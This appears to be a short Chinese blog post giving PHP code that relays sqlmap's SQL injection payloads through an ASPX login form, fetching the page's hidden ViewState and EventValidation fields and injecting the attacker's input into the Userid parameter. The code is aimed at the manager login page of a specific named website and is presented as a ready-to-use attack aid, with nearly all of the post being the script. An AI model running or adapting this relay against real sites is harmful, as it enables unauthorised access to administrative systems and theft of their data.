aspx登陆框过滤不严中转注入php代码

碰到的问题,就是表单有隐藏字段,必须访问下,获取,然后在中转给sqlmap,代码如何
<?php
set_time_limit(0);
$id=$_GET[“id”];
$id=str_replace(” “,”%20”,$id);
$id=str_replace(“=”,”%3D”,$id);
function curlrequest($url,$postfield){
     $user_agent =”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”;
     $ch = curl_init(); // 初始化CURL句柄
     curl_setopt($ch, CURLOPT_URL, $url); //设置请求的URL
     curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);// 设为TRUE把curl_exec()结果转化为字串,而不是直接输出
     curl_setopt($ch, CURLOPT_POST, 1);//启用POST提交
     curl_setopt($ch, CURLOPT_POSTFIELDS, $postfield); //设置POST提交的字符串
     curl_setopt($ch, CURLOPT_TIMEOUT, 25); // 超时时间
     curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);//HTTP请求User-Agent:头
     $document = curl_exec($ch); //执行预定义的CURL
     return $document;
}
//获取必要资源
$yuandaima=file_get_contents(“http://www1.xq.sh.cn/zsjy/manager/default.aspx”);
preg_match_all(‘/value=\”(.*?)\” \/>/’,$yuandaima,$arr);
$VIEWSTATE=str_replace(“value=\””,””,$arr[0][0]);
$VIEWSTATE=str_replace(“\” />”,””,$VIEWSTATE);
$EVENTVALIDATION=str_replace(“value=\””,””,$arr[0][1]);
$EVENTVALIDATION=str_replace(“\” />”,””,$EVENTVALIDATION);
$url=”http://www1.xq.sh.cn/zsjy/manager/default.aspx”;
$postfield=”__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=”.urlencode($VIEWSTATE).”&__EVENTVALIDATION=
“.urlencode($EVENTVALIDATION).”&Pwd=123123&LogButton=登 录&Userid=”.$id;
$str=curlrequest($url,$postfield);
echo $str;
?>